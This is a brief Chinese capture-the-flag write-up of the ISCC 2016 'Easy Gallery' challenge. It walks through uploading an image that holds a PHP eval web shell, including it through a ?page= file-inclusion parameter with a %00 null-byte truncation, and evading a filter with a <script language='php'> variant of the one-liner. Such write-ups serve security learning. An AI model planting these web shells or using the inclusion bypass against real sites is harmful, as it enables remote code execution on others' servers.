Easy Gallery解题记录

首先进入发现有一个文件上传页面
ISCC 2016 Easy Gallery先上传了一张.jpg文件
ISCC 2016 Easy Gallery上传得到一个id
ISCC 2016 Easy Gallery
通过view页面可以查看到自己上传的图片,也可以看到图片的保存路径
ISCC 2016 Easy Gallery
多半是考文件包含
写入一句话木马<?php @eval($_GET['pass']);?>

ISCC 2016 Easy Gallery
发现?page可以插入payload:?page=./uploads/1581496316.jpg
./是当前目录,即http://127.0.0.1:83012/
ISCC 2016 Easy Gallery
但是自动在文件后面加上.php后缀,在url中用%00进行截断
ISCC 2016 Easy Gallery
不行,去网上搜了下,可能是对一句话进行了正则,过滤了
改用<script language="php">@eval($_GET['pass'])</script>
ISCC 2016 Easy GalleryISCC 2016 Easy Gallery
搞定。

<script></script>格式写一句话很常见,之前题目也遇到过,但还是没想到是对一句话木马进行过滤

相关文章: